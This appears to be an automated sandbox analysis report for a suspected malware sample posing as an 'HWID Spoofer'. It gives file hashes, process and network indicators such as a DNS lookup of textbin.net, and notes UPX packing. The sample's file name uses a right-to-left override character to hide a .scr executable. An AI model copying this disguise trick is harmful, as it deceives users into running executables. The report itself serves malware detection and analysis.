SHA512 ede6e3259afaf55229e84af64bd76772fdb5996e4e584045b25e5ef46e6c8ee6f59e1a41c1fc9142256345a25e4cb0c0ef4914136784c53ccccdb7cd556e81b9

C:\Users\Admin\AppData\Local\Temp\nscCC0B.tmp\7z-out\locales\gu.pak

MD5 d52df58e5fe112dd5e663527a4c8223c
SHA1 65ec2b5818fdea16f20e5461f2935133e8f1f862
SHA256 ded84b8350ffb2bd6da63262027174b7e1c465a71eb83cb3a623f0e1d6b11b68
SHA512 42d659ce64e7f026848996c651629d76950154aab17e7dc766b2ebb673be474a82a1b00bbc98f87b2d1bd8259dbfcc26d54372bde001eac8cfbb6af53bfd6da6

C:\Users\Admin\AppData\Local\Temp\nscCC0B.tmp\7z-out\locales\nb.pak

MD5 98a4806d1d4ce65b8c854fd4003e5e96
SHA1 ba5a058b42b81ebbde324ddcfc03801675e58b96
SHA256 98cb62a735c24445f003bff55558a6c2f1aefbc834946f565cc72ac801aa4284
SHA512 40f05042d4640f895fe24293ca5cb1bc6339cf7e1d8e90312899628fbc092c173d3c5c26faf46015300d63e5cb7c16cdb80b3dd15221b120a464647b6c7a5fbf

C:\Users\Admin\AppData\Local\Temp\nscCC0B.tmp\7z-out\locales\ms.pak

MD5 72b9aeaa6634c23d29469e52e06a90ce
SHA1 a32044cd6df457579a8cb0c9348338ef4551d5f3
SHA256 8687188c589343955f5ed9751e3b21a1661c24e17797624de79317df3109c240
SHA512 40ed4c1bdb6912e6ecac62d08ced6575cea7c67ace130754ee261e8478b4f8ad819963a79fedc242cb6a8a6923f201e612a4533b6a8791553d147c7251e5ba2f

C:\Users\Admin\AppData\Local\Temp\nscCC0B.tmp\7z-out\locales\mr.pak

MD5 9fd647e913425c12963b68afbadd359f
SHA1 514d8d34d4a225295b9dc05c4cc04e0f00981a2a

Analysis: behavioral2

Detonation Overview

Submitted

2023-12-14 16:26

Reported

2023-12-14 16:27

Platform

win11-20231129-en

Max time kernel

11s

Max time network

1s

Command Line

"C:\Users\Admin\AppData\Local\Temp\HWID Spoofer Resou‮nls..scr" /S

Signatures

UPX packed file

upx
Description Indicator Process Target
N/A N/A N/A N/A
N/A N/A N/A N/A

Processes

C:\Users\Admin\AppData\Local\Temp\HWID Spoofer Resou‮nls..scr

"C:\Users\Admin\AppData\Local\Temp\HWID Spoofer Resou‮nls..scr" /S

Network

Country Destination Domain Proto
US 8.8.8.8:53 textbin.net udp

Files

memory/860-0-0x00007FF7C6890000-0x00007FF7C69F4000-memory.dmp

memory/860-1-0x00007FF7C6890000-0x00007FF7C69F4000-memory.dmp